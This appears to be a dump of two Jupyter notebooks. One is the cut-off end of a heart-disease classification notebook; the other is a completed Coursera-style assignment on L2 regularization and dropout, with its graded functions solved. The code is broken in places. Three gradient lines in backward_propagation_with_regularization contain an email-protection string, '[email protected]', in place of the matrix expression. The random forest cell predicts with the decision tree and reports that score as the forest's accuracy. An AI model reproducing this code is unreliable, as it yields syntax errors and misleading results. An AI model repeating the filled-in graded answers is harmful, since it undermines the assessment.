"# define the columns to be encoded and scaled\ncat_cols = ['sex','exng','caa','cp']\ncon_cols = [\"age\",\"trtbps\",\"chol\",\"thalachh\"]\n\n# creating a copy of data\ndf1 = data[cat_cols + con_cols]\n\n# encoding the categorical columns\nX = pd.get_dummies(df1, columns = cat_cols, drop_first = True)\n\n# defining the features and target\ny = data[['output']]\n\n# instantiating the scaler\nscaler = RobustScaler()\n\n# scaling the continuous featuree\nX[con_cols] = scaler.fit_transform(X[con_cols])\nprint(\"The first 5 rows of X are\")\nX.head()",
"The first 5 rows of X are\n"
],
[
"# Train and test split\n\nX_train, X_test, y_train, y_test = train_test_split(X,y, test_size = 0.2, random_state = 42)\nprint(\"The shape of X_train is \", X_train.shape)\nprint(\"The shape of X_test is \",X_test.shape)\nprint(\"The shape of y_train is \",y_train.shape)\nprint(\"The shape of y_test is \",y_test.shape)",
"The shape of X_train is (242, 13)\nThe shape of X_test is (61, 13)\nThe shape of y_train is (242, 1)\nThe shape of y_test is (61, 1)\n"
]
],
[
[
"## Modeling\n\n### 1. Support Vector Machines",
"_____no_output_____"
]
],
[
[
"# instantiating the object and fitting\nclf = SVC(kernel='linear', C=1, random_state=42).fit(X_train,y_train)\n\n# predicting the values\ny_pred = clf.predict(X_test)\n\n# printing the test accuracy\nprint(\"The test accuracy score of SVM is \", accuracy_score(y_test, y_pred))",
"The test accuracy score of SVM is 0.8688524590163934\n"
]
],
[
[
"## Hyperparameter tuning of SVC",
"_____no_output_____"
]
],
[
[
"# instantiating the object\nsvm = SVC()\n\n# setting a grid - not so extensive\nparameters = {\"C\":np.arange(1,10,1),'gamma':[0.00001,0.00005, 0.0001,0.0005,0.001,0.005,0.01,0.05,0.1,0.5,1,5]}\n\n# instantiating the GridSearchCV object\nsearcher = GridSearchCV(svm, parameters)\n\n# fitting the object\nsearcher.fit(X_train, y_train)\n\n# the scores\nprint(\"The best params are :\", searcher.best_params_)\nprint(\"The best score is :\", searcher.best_score_)\n\n# predicting the values\ny_pred = searcher.predict(X_test)\n\n# printing the test accuracy\nprint(\"The test accuracy score of SVM after hyper-parameter tuning is \", accuracy_score(y_test, y_pred))",
"The best params are : {'C': 5, 'gamma': 1}\nThe best score is : 0.7935374149659864\nThe test accuracy score of SVM after hyper-parameter tuning is 0.7868852459016393\n"
]
],
[
[
"## Decision Tree",
"_____no_output_____"
]
],
[
[
"# instantiating the object\ndt = DecisionTreeClassifier(random_state = 42)\n\n# fitting the model\ndt.fit(X_train, y_train)\n\n# calculating the predictions\ny_pred = dt.predict(X_test)\n\n# printing the test accuracy\nprint(\"The test accuracy score of Decision Tree is \", accuracy_score(y_test, y_pred))",
"The test accuracy score of Decision Tree is 0.7049180327868853\n"
]
],
[
[
"## Random Forest",
"_____no_output_____"
]
],
[
[
"# instantiating the object\nrf = RandomForestClassifier()\n\n# fitting the model\nrf.fit(X_train, y_train)\n\n# calculating the predictions\ny_pred = dt.predict(X_test)\n\n# printing the test accuracy\nprint(\"The test accuracy score of Random Forest is \", accuracy_score(y_test, y_pred))\n",
"The test accuracy score of Random Forest is 0.7049180327868853\n"
]
],
[
[
" ## Gradient Boosting Classifier",
"_____no_output_____"
]
],
[
[
"# instantiate the classifier\ngbt = GradientBoostingClassifier(n_estimators = 300,max_depth=5,subsample=0.8,max_features=0.2,random_state=42)\n\n# fitting the model\ngbt.fit(X_train,y_train)\n\n# predicting values\ny_pred = gbt.predict(X_test)\nprint(\"The test accuracy score of Gradient Boosting Classifier is \", accuracy_score(y_test, y_pred))",
"The test accuracy score of Gradient Boosting Classifier is 0.8032786885245902\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb2c32aa7a672daf2d94a00a6e6a7e8e499919be | 273,875 | ipynb | Jupyter Notebook | module_2/Regularization_v2a.ipynb | Ry-8001/Machine-Deep-Learning | 243f506ff0c8cfedda12d72761d34b058f84ea7b | [
"MIT"
] | null | null | null | module_2/Regularization_v2a.ipynb | Ry-8001/Machine-Deep-Learning | 243f506ff0c8cfedda12d72761d34b058f84ea7b | [
"MIT"
] | null | null | null | module_2/Regularization_v2a.ipynb | Ry-8001/Machine-Deep-Learning | 243f506ff0c8cfedda12d72761d34b058f84ea7b | [
"MIT"
] | null | null | null | 241.725508 | 56,104 | 0.891724 | [
[
[
"# Regularization\n\nWelcome to the second assignment of this week. Deep Learning models have so much flexibility and capacity that **overfitting can be a serious problem**, if the training dataset is not big enough. Sure it does well on the training set, but the learned network **doesn't generalize to new examples** that it has never seen!\n\n**You will learn to:** Use regularization in your deep learning models.\n\nLet's first import the packages you are going to use.",
"_____no_output_____"
],
[
"### <font color='darkblue'> Updates to Assignment <font>\n\n#### If you were working on a previous version\n* The current notebook filename is version \"2a\". \n* You can find your work in the file directory as version \"2\".\n* To see the file directory, click on the Coursera logo at the top left of the notebook.\n\n#### List of Updates\n* Clarified explanation of 'keep_prob' in the text description.\n* Fixed a comment so that keep_prob and 1-keep_prob add up to 100%\n* Updated print statements and 'expected output' for easier visual comparisons.",
"_____no_output_____"
]
],
[
[
"# import packages\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom reg_utils import sigmoid, relu, plot_decision_boundary, initialize_parameters, load_2D_dataset, predict_dec\nfrom reg_utils import compute_cost, predict, forward_propagation, backward_propagation, update_parameters\nimport sklearn\nimport sklearn.datasets\nimport scipy.io\nfrom testCases import *\n\n%matplotlib inline\nplt.rcParams['figure.figsize'] = (7.0, 4.0) # set default size of plots\nplt.rcParams['image.interpolation'] = 'nearest'\nplt.rcParams['image.cmap'] = 'gray'",
"_____no_output_____"
]
],
[
[
"**Problem Statement**: You have just been hired as an AI expert by the French Football Corporation. They would like you to recommend positions where France's goal keeper should kick the ball so that the French team's players can then hit it with their head. \n\n<img src=\"images/field_kiank.png\" style=\"width:600px;height:350px;\">\n<caption><center> <u> **Figure 1** </u>: **Football field**<br> The goal keeper kicks the ball in the air, the players of each team are fighting to hit the ball with their head </center></caption>\n\n\nThey give you the following 2D dataset from France's past 10 games.",
"_____no_output_____"
]
],
[
[
"train_X, train_Y, test_X, test_Y = load_2D_dataset()",
"_____no_output_____"
]
],
[
[
"Each dot corresponds to a position on the football field where a football player has hit the ball with his/her head after the French goal keeper has shot the ball from the left side of the football field.\n- If the dot is blue, it means the French player managed to hit the ball with his/her head\n- If the dot is red, it means the other team's player hit the ball with their head\n\n**Your goal**: Use a deep learning model to find the positions on the field where the goalkeeper should kick the ball.",
"_____no_output_____"
],
[
"**Analysis of the dataset**: This dataset is a little noisy, but it looks like a diagonal line separating the upper left half (blue) from the lower right half (red) would work well. \n\nYou will first try a non-regularized model. Then you'll learn how to regularize it and decide which model you will choose to solve the French Football Corporation's problem. ",
"_____no_output_____"
],
[
"## 1 - Non-regularized model\n\nYou will use the following neural network (already implemented for you below). This model can be used:\n- in *regularization mode* -- by setting the `lambd` input to a non-zero value. We use \"`lambd`\" instead of \"`lambda`\" because \"`lambda`\" is a reserved keyword in Python. \n- in *dropout mode* -- by setting the `keep_prob` to a value less than one\n\nYou will first try the model without any regularization. Then, you will implement:\n- *L2 regularization* -- functions: \"`compute_cost_with_regularization()`\" and \"`backward_propagation_with_regularization()`\"\n- *Dropout* -- functions: \"`forward_propagation_with_dropout()`\" and \"`backward_propagation_with_dropout()`\"\n\nIn each part, you will run this model with the correct inputs so that it calls the functions you've implemented. Take a look at the code below to familiarize yourself with the model.",
"_____no_output_____"
]
],
[
[
"def model(X, Y, learning_rate = 0.3, num_iterations = 30000, print_cost = True, lambd = 0, keep_prob = 1):\n \"\"\"\n Implements a three-layer neural network: LINEAR->RELU->LINEAR->RELU->LINEAR->SIGMOID.\n \n Arguments:\n X -- input data, of shape (input size, number of examples)\n Y -- true \"label\" vector (1 for blue dot / 0 for red dot), of shape (output size, number of examples)\n learning_rate -- learning rate of the optimization\n num_iterations -- number of iterations of the optimization loop\n print_cost -- If True, print the cost every 10000 iterations\n lambd -- regularization hyperparameter, scalar\n keep_prob - probability of keeping a neuron active during drop-out, scalar.\n \n Returns:\n parameters -- parameters learned by the model. They can then be used to predict.\n \"\"\"\n \n grads = {}\n costs = [] # to keep track of the cost\n m = X.shape[1] # number of examples\n layers_dims = [X.shape[0], 20, 3, 1]\n \n # Initialize parameters dictionary.\n parameters = initialize_parameters(layers_dims)\n\n # Loop (gradient descent)\n\n for i in range(0, num_iterations):\n\n # Forward propagation: LINEAR -> RELU -> LINEAR -> RELU -> LINEAR -> SIGMOID.\n if keep_prob == 1:\n a3, cache = forward_propagation(X, parameters)\n elif keep_prob < 1:\n a3, cache = forward_propagation_with_dropout(X, parameters, keep_prob)\n \n # Cost function\n if lambd == 0:\n cost = compute_cost(a3, Y)\n else:\n cost = compute_cost_with_regularization(a3, Y, parameters, lambd)\n \n # Backward propagation.\n assert(lambd==0 or keep_prob==1) # it is possible to use both L2 regularization and dropout, \n # but this assignment will only explore one at a time\n if lambd == 0 and keep_prob == 1:\n grads = backward_propagation(X, Y, cache)\n elif lambd != 0:\n grads = backward_propagation_with_regularization(X, Y, cache, lambd)\n elif keep_prob < 1:\n grads = backward_propagation_with_dropout(X, Y, cache, keep_prob)\n \n # Update parameters.\n parameters = update_parameters(parameters, grads, learning_rate)\n \n # Print the loss every 10000 iterations\n if print_cost and i % 10000 == 0:\n print(\"Cost after iteration {}: {}\".format(i, cost))\n if print_cost and i % 1000 == 0:\n costs.append(cost)\n \n # plot the cost\n plt.plot(costs)\n plt.ylabel('cost')\n plt.xlabel('iterations (x1,000)')\n plt.title(\"Learning rate =\" + str(learning_rate))\n plt.show()\n \n return parameters",
"_____no_output_____"
]
],
[
[
"Let's train the model without any regularization, and observe the accuracy on the train/test sets.",
"_____no_output_____"
]
],
[
[
"parameters = model(train_X, train_Y)\nprint (\"On the training set:\")\npredictions_train = predict(train_X, train_Y, parameters)\nprint (\"On the test set:\")\npredictions_test = predict(test_X, test_Y, parameters)",
"Cost after iteration 0: 0.6557412523481002\nCost after iteration 10000: 0.16329987525724213\nCost after iteration 20000: 0.13851642423253263\n"
]
],
[
[
"The train accuracy is 94.8% while the test accuracy is 91.5%. This is the **baseline model** (you will observe the impact of regularization on this model). Run the following code to plot the decision boundary of your model.",
"_____no_output_____"
]
],
[
[
"plt.title(\"Model without regularization\")\naxes = plt.gca()\naxes.set_xlim([-0.75,0.40])\naxes.set_ylim([-0.75,0.65])\nplot_decision_boundary(lambda x: predict_dec(parameters, x.T), train_X, train_Y)",
"_____no_output_____"
]
],
[
[
"The non-regularized model is obviously overfitting the training set. It is fitting the noisy points! Lets now look at two techniques to reduce overfitting.",
"_____no_output_____"
],
[
"## 2 - L2 Regularization\n\nThe standard way to avoid overfitting is called **L2 regularization**. It consists of appropriately modifying your cost function, from:\n$$J = -\\frac{1}{m} \\sum\\limits_{i = 1}^{m} \\large{(}\\small y^{(i)}\\log\\left(a^{[L](i)}\\right) + (1-y^{(i)})\\log\\left(1- a^{[L](i)}\\right) \\large{)} \\tag{1}$$\nTo:\n$$J_{regularized} = \\small \\underbrace{-\\frac{1}{m} \\sum\\limits_{i = 1}^{m} \\large{(}\\small y^{(i)}\\log\\left(a^{[L](i)}\\right) + (1-y^{(i)})\\log\\left(1- a^{[L](i)}\\right) \\large{)} }_\\text{cross-entropy cost} + \\underbrace{\\frac{1}{m} \\frac{\\lambda}{2} \\sum\\limits_l\\sum\\limits_k\\sum\\limits_j W_{k,j}^{[l]2} }_\\text{L2 regularization cost} \\tag{2}$$\n\nLet's modify your cost and observe the consequences.\n\n**Exercise**: Implement `compute_cost_with_regularization()` which computes the cost given by formula (2). To calculate $\\sum\\limits_k\\sum\\limits_j W_{k,j}^{[l]2}$ , use :\n```python\nnp.sum(np.square(Wl))\n```\nNote that you have to do this for $W^{[1]}$, $W^{[2]}$ and $W^{[3]}$, then sum the three terms and multiply by $ \\frac{1}{m} \\frac{\\lambda}{2} $.",
"_____no_output_____"
]
],
[
[
"# GRADED FUNCTION: compute_cost_with_regularization\n\ndef compute_cost_with_regularization(A3, Y, parameters, lambd):\n \"\"\"\n Implement the cost function with L2 regularization. See formula (2) above.\n \n Arguments:\n A3 -- post-activation, output of forward propagation, of shape (output size, number of examples)\n Y -- \"true\" labels vector, of shape (output size, number of examples)\n parameters -- python dictionary containing parameters of the model\n \n Returns:\n cost - value of the regularized loss function (formula (2))\n \"\"\"\n m = Y.shape[1]\n W1 = parameters[\"W1\"]\n W2 = parameters[\"W2\"]\n W3 = parameters[\"W3\"]\n \n cross_entropy_cost = compute_cost(A3, Y) # This gives you the cross-entropy part of the cost\n \n ### START CODE HERE ### (approx. 1 line)\n L2_regularization_cost=(np.sum(np.square(W1))+np.sum(np.square(W2))+np.sum(np.square(W3)))*lambd/(2*m)\n ### END CODER HERE ###\n \n cost = cross_entropy_cost + L2_regularization_cost\n \n return cost",
"_____no_output_____"
],
[
"A3, Y_assess, parameters = compute_cost_with_regularization_test_case()\n\nprint(\"cost = \" + str(compute_cost_with_regularization(A3, Y_assess, parameters, lambd = 0.1)))",
"cost = 1.78648594516\n"
]
],
[
[
"**Expected Output**: \n\n<table> \n <tr>\n <td>\n **cost**\n </td>\n <td>\n 1.78648594516\n </td>\n \n </tr>\n\n</table> ",
"_____no_output_____"
],
[
"Of course, because you changed the cost, you have to change backward propagation as well! All the gradients have to be computed with respect to this new cost. \n\n**Exercise**: Implement the changes needed in backward propagation to take into account regularization. The changes only concern dW1, dW2 and dW3. For each, you have to add the regularization term's gradient ($\\frac{d}{dW} ( \\frac{1}{2}\\frac{\\lambda}{m} W^2) = \\frac{\\lambda}{m} W$).",
"_____no_output_____"
]
],
[
[
"# GRADED FUNCTION: backward_propagation_with_regularization\n\ndef backward_propagation_with_regularization(X, Y, cache, lambd):\n \"\"\"\n Implements the backward propagation of our baseline model to which we added an L2 regularization.\n \n Arguments:\n X -- input dataset, of shape (input size, number of examples)\n Y -- \"true\" labels vector, of shape (output size, number of examples)\n cache -- cache output from forward_propagation()\n lambd -- regularization hyperparameter, scalar\n \n Returns:\n gradients -- A dictionary with the gradients with respect to each parameter, activation and pre-activation variables\n \"\"\"\n \n m = X.shape[1]\n (Z1, A1, W1, b1, Z2, A2, W2, b2, Z3, A3, W3, b3) = cache\n \n dZ3 = A3 - Y\n \n ### START CODE HERE ### (approx. 1 line)\n dW3 = ([email protected] )/m + lambd/m*W3\n ### END CODE HERE ###\n db3 = 1./m * np.sum(dZ3, axis=1, keepdims = True)\n \n dA2 = np.dot(W3.T, dZ3)\n dZ2 = np.multiply(dA2, np.int64(A2 > 0))\n ### START CODE HERE ### (approx. 1 line)\n dW2 = ([email protected] )/m + lambd/m*W2\n ### END CODE HERE ###\n db2 = 1./m * np.sum(dZ2, axis=1, keepdims = True)\n \n dA1 = np.dot(W2.T, dZ2)\n dZ1 = np.multiply(dA1, np.int64(A1 > 0))\n ### START CODE HERE ### (approx. 1 line)\n dW1 = ([email protected] )/m + lambd/m*W1\n ### END CODE HERE ###\n db1 = 1./m * np.sum(dZ1, axis=1, keepdims = True)\n \n gradients = {\"dZ3\": dZ3, \"dW3\": dW3, \"db3\": db3,\"dA2\": dA2,\n \"dZ2\": dZ2, \"dW2\": dW2, \"db2\": db2, \"dA1\": dA1, \n \"dZ1\": dZ1, \"dW1\": dW1, \"db1\": db1}\n \n return gradients",
"_____no_output_____"
],
[
"X_assess, Y_assess, cache = backward_propagation_with_regularization_test_case()\n\ngrads = backward_propagation_with_regularization(X_assess, Y_assess, cache, lambd = 0.7)\nprint (\"dW1 = \\n\"+ str(grads[\"dW1\"]))\nprint (\"dW2 = \\n\"+ str(grads[\"dW2\"]))\nprint (\"dW3 = \\n\"+ str(grads[\"dW3\"]))",
"dW1 = \n[[-0.25604646 0.12298827 -0.28297129]\n [-0.17706303 0.34536094 -0.4410571 ]]\ndW2 = \n[[ 0.79276486 0.85133918]\n [-0.0957219 -0.01720463]\n [-0.13100772 -0.03750433]]\ndW3 = \n[[-1.77691347 -0.11832879 -0.09397446]]\n"
]
],
[
[
"**Expected Output**:\n\n```\ndW1 = \n[[-0.25604646 0.12298827 -0.28297129]\n [-0.17706303 0.34536094 -0.4410571 ]]\ndW2 = \n[[ 0.79276486 0.85133918]\n [-0.0957219 -0.01720463]\n [-0.13100772 -0.03750433]]\ndW3 = \n[[-1.77691347 -0.11832879 -0.09397446]]\n```",
"_____no_output_____"
],
[
"Let's now run the model with L2 regularization $(\\lambda = 0.7)$. The `model()` function will call: \n- `compute_cost_with_regularization` instead of `compute_cost`\n- `backward_propagation_with_regularization` instead of `backward_propagation`",
"_____no_output_____"
]
],
[
[
"parameters = model(train_X, train_Y, lambd = 0.7)\nprint (\"On the train set:\")\npredictions_train = predict(train_X, train_Y, parameters)\nprint (\"On the test set:\")\npredictions_test = predict(test_X, test_Y, parameters)",
"Cost after iteration 0: 0.6974484493131264\nCost after iteration 10000: 0.2684918873282239\nCost after iteration 20000: 0.2680916337127301\n"
]
],
[
[
"Congrats, the test set accuracy increased to 93%. You have saved the French football team!\n\nYou are not overfitting the training data anymore. Let's plot the decision boundary.",
"_____no_output_____"
]
],
[
[
"plt.title(\"Model with L2-regularization\")\naxes = plt.gca()\naxes.set_xlim([-0.75,0.40])\naxes.set_ylim([-0.75,0.65])\nplot_decision_boundary(lambda x: predict_dec(parameters, x.T), train_X, train_Y)",
"_____no_output_____"
]
],
[
[
"**Observations**:\n- The value of $\\lambda$ is a hyperparameter that you can tune using a dev set.\n- L2 regularization makes your decision boundary smoother. If $\\lambda$ is too large, it is also possible to \"oversmooth\", resulting in a model with high bias.\n\n**What is L2-regularization actually doing?**:\n\nL2-regularization relies on the assumption that a model with small weights is simpler than a model with large weights. Thus, by penalizing the square values of the weights in the cost function you drive all the weights to smaller values. It becomes too costly for the cost to have large weights! This leads to a smoother model in which the output changes more slowly as the input changes. \n\n<font color='blue'>\n**What you should remember** -- the implications of L2-regularization on:\n- The cost computation:\n - A regularization term is added to the cost\n- The backpropagation function:\n - There are extra terms in the gradients with respect to weight matrices\n- Weights end up smaller (\"weight decay\"): \n - Weights are pushed to smaller values.",
"_____no_output_____"
],
[
"## 3 - Dropout\n\nFinally, **dropout** is a widely used regularization technique that is specific to deep learning. \n**It randomly shuts down some neurons in each iteration.** Watch these two videos to see what this means!\n\n<!--\nTo understand drop-out, consider this conversation with a friend:\n- Friend: \"Why do you need all these neurons to train your network and classify images?\". \n- You: \"Because each neuron contains a weight and can learn specific features/details/shape of an image. The more neurons I have, the more featurse my model learns!\"\n- Friend: \"I see, but are you sure that your neurons are learning different features and not all the same features?\"\n- You: \"Good point... Neurons in the same layer actually don't talk to each other. It should be definitly possible that they learn the same image features/shapes/forms/details... which would be redundant. There should be a solution.\"\n!--> \n\n\n<center>\n<video width=\"620\" height=\"440\" src=\"images/dropout1_kiank.mp4\" type=\"video/mp4\" controls>\n</video>\n</center>\n<br>\n<caption><center> <u> Figure 2 </u>: Drop-out on the second hidden layer. <br> At each iteration, you shut down (= set to zero) each neuron of a layer with probability $1 - keep\\_prob$ or keep it with probability $keep\\_prob$ (50% here). The dropped neurons don't contribute to the training in both the forward and backward propagations of the iteration. </center></caption>\n\n<center>\n<video width=\"620\" height=\"440\" src=\"images/dropout2_kiank.mp4\" type=\"video/mp4\" controls>\n</video>\n</center>\n\n<caption><center> <u> Figure 3 </u>: Drop-out on the first and third hidden layers. <br> $1^{st}$ layer: we shut down on average 40% of the neurons. $3^{rd}$ layer: we shut down on average 20% of the neurons. </center></caption>\n\n\nWhen you shut some neurons down, you actually modify your model. The idea behind drop-out is that at each iteration, you train a different model that uses only a subset of your neurons. With dropout, your neurons thus become less sensitive to the activation of one other specific neuron, because that other neuron might be shut down at any time. \n\n### 3.1 - Forward propagation with dropout\n\n**Exercise**: Implement the forward propagation with dropout. You are using a 3 layer neural network, and will add dropout to the first and second hidden layers. We will not apply dropout to the input layer or output layer. \n\n**Instructions**:\nYou would like to shut down some neurons in the first and second layers. To do that, you are going to carry out 4 Steps:\n1. In lecture, we dicussed creating a variable $d^{[1]}$ with the same shape as $a^{[1]}$ using `np.random.rand()` to randomly get numbers between 0 and 1. Here, you will use a vectorized implementation, so create a random matrix $D^{[1]} = [d^{[1](1)} d^{[1](2)} ... d^{[1](m)}] $ of the same dimension as $A^{[1]}$.\n2. Set each entry of $D^{[1]}$ to be 1 with probability (`keep_prob`), and 0 otherwise.\n\n**Hint:** Let's say that keep_prob = 0.8, which means that we want to keep about 80% of the neurons and drop out about 20% of them. We want to generate a vector that has 1's and 0's, where about 80% of them are 1 and about 20% are 0.\nThis python statement: \n`X = (X < keep_prob).astype(int)` \n\nis conceptually the same as this if-else statement (for the simple case of a one-dimensional array) :\n\n```\nfor i,v in enumerate(x):\n if v < keep_prob:\n x[i] = 1\n else: # v >= keep_prob\n x[i] = 0\n```\nNote that the `X = (X < keep_prob).astype(int)` works with multi-dimensional arrays, and the resulting output preserves the dimensions of the input array.\n\nAlso note that without using `.astype(int)`, the result is an array of booleans `True` and `False`, which Python automatically converts to 1 and 0 if we multiply it with numbers. (However, it's better practice to convert data into the data type that we intend, so try using `.astype(int)`.)\n\n3. Set $A^{[1]}$ to $A^{[1]} * D^{[1]}$. (You are shutting down some neurons). You can think of $D^{[1]}$ as a mask, so that when it is multiplied with another matrix, it shuts down some of the values.\n4. Divide $A^{[1]}$ by `keep_prob`. By doing this you are assuring that the result of the cost will still have the same expected value as without drop-out. (This technique is also called inverted dropout.)",
"_____no_output_____"
]
],
[
[
"# GRADED FUNCTION: forward_propagation_with_dropout\n\ndef forward_propagation_with_dropout(X, parameters, keep_prob = 0.5):\n \"\"\"\n Implements the forward propagation: LINEAR -> RELU + DROPOUT -> LINEAR -> RELU + DROPOUT -> LINEAR -> SIGMOID.\n \n Arguments:\n X -- input dataset, of shape (2, number of examples)\n parameters -- python dictionary containing your parameters \"W1\", \"b1\", \"W2\", \"b2\", \"W3\", \"b3\":\n W1 -- weight matrix of shape (20, 2)\n b1 -- bias vector of shape (20, 1)\n W2 -- weight matrix of shape (3, 20)\n b2 -- bias vector of shape (3, 1)\n W3 -- weight matrix of shape (1, 3)\n b3 -- bias vector of shape (1, 1)\n keep_prob - probability of keeping a neuron active during drop-out, scalar\n \n Returns:\n A3 -- last activation value, output of the forward propagation, of shape (1,1)\n cache -- tuple, information stored for computing the backward propagation\n \"\"\"\n \n np.random.seed(1)\n \n # retrieve parameters\n W1 = parameters[\"W1\"]\n b1 = parameters[\"b1\"]\n W2 = parameters[\"W2\"]\n b2 = parameters[\"b2\"]\n W3 = parameters[\"W3\"]\n b3 = parameters[\"b3\"]\n \n # LINEAR -> RELU -> LINEAR -> RELU -> LINEAR -> SIGMOID\n Z1 = np.dot(W1, X) + b1\n A1 = relu(Z1)\n ### START CODE HERE ### (approx. 4 lines) # Steps 1-4 below correspond to the Steps 1-4 described above. \n D1 = np.random.rand(A1.shape[0],A1.shape[1]) # Step 1: initialize matrix D1 = np.random.rand(..., ...)\n D1=(D1< keep_prob).astype(int) # Step 2: convert entries of D1 to 0 or 1 (using keep_prob as the threshold)\n A1=A1*D1 \n A1=A1/keep_prob # Step 4: scale the value of neurons that haven't been shut down\n ### END CODE HERE ###\n Z2 = np.dot(W2, A1) + b2\n A2 = relu(Z2)\n ### START CODE HERE ### (approx. 4 lines)\n D2 = np.random.rand(A2.shape[0],A2.shape[1]) # Step 1: initialize matrix D2 = np.random.rand(..., ...)\n D2=(D2< keep_prob).astype(int) # Step 2: convert entries of D2 to 0 or 1 (using keep_prob as the threshold)\n A2=A2*D2 # Step 3: shut down some neurons of A2\n A2=A2/keep_prob # Step 4: scale the value of neurons that haven't been shut down\n ### END CODE HERE ###\n Z3 = np.dot(W3, A2) + b3\n A3 = sigmoid(Z3)\n \n cache = (Z1, D1, A1, W1, b1, Z2, D2, A2, W2, b2, Z3, A3, W3, b3)\n \n return A3, cache",
"_____no_output_____"
],
[
"X_assess, parameters = forward_propagation_with_dropout_test_case()\n\nA3, cache = forward_propagation_with_dropout(X_assess, parameters, keep_prob = 0.7)\nprint (\"A3 = \" + str(A3))",
"A3 = [[ 0.36974721 0.00305176 0.04565099 0.49683389 0.36974721]]\n"
]
],
[
[
"**Expected Output**: \n\n<table> \n <tr>\n <td>\n **A3**\n </td>\n <td>\n [[ 0.36974721 0.00305176 0.04565099 0.49683389 0.36974721]]\n </td>\n \n </tr>\n\n</table> ",
"_____no_output_____"
],
[
"### 3.2 - Backward propagation with dropout\n\n**Exercise**: Implement the backward propagation with dropout. As before, you are training a 3 layer network. Add dropout to the first and second hidden layers, using the masks $D^{[1]}$ and $D^{[2]}$ stored in the cache. \n\n**Instruction**:\nBackpropagation with dropout is actually quite easy. You will have to carry out 2 Steps:\n1. You had previously shut down some neurons during forward propagation, by applying a mask $D^{[1]}$ to `A1`. In backpropagation, you will have to shut down the same neurons, by reapplying the same mask $D^{[1]}$ to `dA1`. \n2. During forward propagation, you had divided `A1` by `keep_prob`. In backpropagation, you'll therefore have to divide `dA1` by `keep_prob` again (the calculus interpretation is that if $A^{[1]}$ is scaled by `keep_prob`, then its derivative $dA^{[1]}$ is also scaled by the same `keep_prob`).\n",
"_____no_output_____"
]
],
[
[
"# GRADED FUNCTION: backward_propagation_with_dropout\n\ndef backward_propagation_with_dropout(X, Y, cache, keep_prob):\n \"\"\"\n Implements the backward propagation of our baseline model to which we added dropout.\n \n Arguments:\n X -- input dataset, of shape (2, number of examples)\n Y -- \"true\" labels vector, of shape (output size, number of examples)\n cache -- cache output from forward_propagation_with_dropout()\n keep_prob - probability of keeping a neuron active during drop-out, scalar\n \n Returns:\n gradients -- A dictionary with the gradients with respect to each parameter, activation and pre-activation variables\n \"\"\"\n \n m = X.shape[1]\n (Z1, D1, A1, W1, b1, Z2, D2, A2, W2, b2, Z3, A3, W3, b3) = cache\n \n dZ3 = A3 - Y\n dW3 = 1./m * np.dot(dZ3, A2.T)\n db3 = 1./m * np.sum(dZ3, axis=1, keepdims = True)\n dA2 = np.dot(W3.T, dZ3)\n ### START CODE HERE ### (≈ 2 lines of code)\n dA2=dA2*D2 # Step 1: Apply mask D2 to shut down the same neurons as during the forward propagation\n dA2=dA2/keep_prob # Step 2: Scale the value of neurons that haven't been shut down\n ### END CODE HERE ###\n dZ2 = np.multiply(dA2, np.int64(A2 > 0))\n dW2 = 1./m * np.dot(dZ2, A1.T)\n db2 = 1./m * np.sum(dZ2, axis=1, keepdims = True)\n \n dA1 = np.dot(W2.T, dZ2)\n ### START CODE HERE ### (≈ 2 lines of code)\n dA1=dA1*D1 # Step 1: Apply mask D1 to shut down the same neurons as during the forward propagation\n dA1=dA1/keep_prob # Step 2: Scale the value of neurons that haven't been shut down\n ### END CODE HERE ###\n dZ1 = np.multiply(dA1, np.int64(A1 > 0))\n dW1 = 1./m * np.dot(dZ1, X.T)\n db1 = 1./m * np.sum(dZ1, axis=1, keepdims = True)\n \n gradients = {\"dZ3\": dZ3, \"dW3\": dW3, \"db3\": db3,\"dA2\": dA2,\n \"dZ2\": dZ2, \"dW2\": dW2, \"db2\": db2, \"dA1\": dA1, \n \"dZ1\": dZ1, \"dW1\": dW1, \"db1\": db1}\n \n return gradients",
"_____no_output_____"
],
[
"X_assess, Y_assess, cache = backward_propagation_with_dropout_test_case()\n\ngradients = backward_propagation_with_dropout(X_assess, Y_assess, cache, keep_prob = 0.8)\n\nprint (\"dA1 = \\n\" + str(gradients[\"dA1\"]))\nprint (\"dA2 = \\n\" + str(gradients[\"dA2\"]))",
"dA1 = \n[[ 0.36544439 0. -0.00188233 0. -0.17408748]\n [ 0.65515713 0. -0.00337459 0. -0. ]]\ndA2 = \n[[ 0.58180856 0. -0.00299679 0. -0.27715731]\n [ 0. 0.53159854 -0. 0.53159854 -0.34089673]\n [ 0. 0. -0.00292733 0. -0. ]]\n"
]
],
[
[
"**Expected Output**: \n\n```\ndA1 = \n[[ 0.36544439 0. -0.00188233 0. -0.17408748]\n [ 0.65515713 0. -0.00337459 0. -0. ]]\ndA2 = \n[[ 0.58180856 0. -0.00299679 0. -0.27715731]\n [ 0. 0.53159854 -0. 0.53159854 -0.34089673]\n [ 0. 0. -0.00292733 0. -0. ]]\n```",
"_____no_output_____"
],
[
"Let's now run the model with dropout (`keep_prob = 0.86`). It means at every iteration you shut down each neurons of layer 1 and 2 with 14% probability. The function `model()` will now call:\n- `forward_propagation_with_dropout` instead of `forward_propagation`.\n- `backward_propagation_with_dropout` instead of `backward_propagation`.",
"_____no_output_____"
]
],
[
[
"parameters = model(train_X, train_Y, keep_prob = 0.86, learning_rate = 0.3)\n\nprint (\"On the train set:\")\npredictions_train = predict(train_X, train_Y, parameters)\nprint (\"On the test set:\")\npredictions_test = predict(test_X, test_Y, parameters)",
"Cost after iteration 0: 0.6543912405149825\n"
]
],
[
[
"Dropout works great! The test accuracy has increased again (to 95%)! Your model is not overfitting the training set and does a great job on the test set. The French football team will be forever grateful to you! \n\nRun the code below to plot the decision boundary.",
"_____no_output_____"
]
],
[
[
"plt.title(\"Model with dropout\")\naxes = plt.gca()\naxes.set_xlim([-0.75,0.40])\naxes.set_ylim([-0.75,0.65])\nplot_decision_boundary(lambda x: predict_dec(parameters, x.T), train_X, train_Y)",
"_____no_output_____"
]
],
[
[
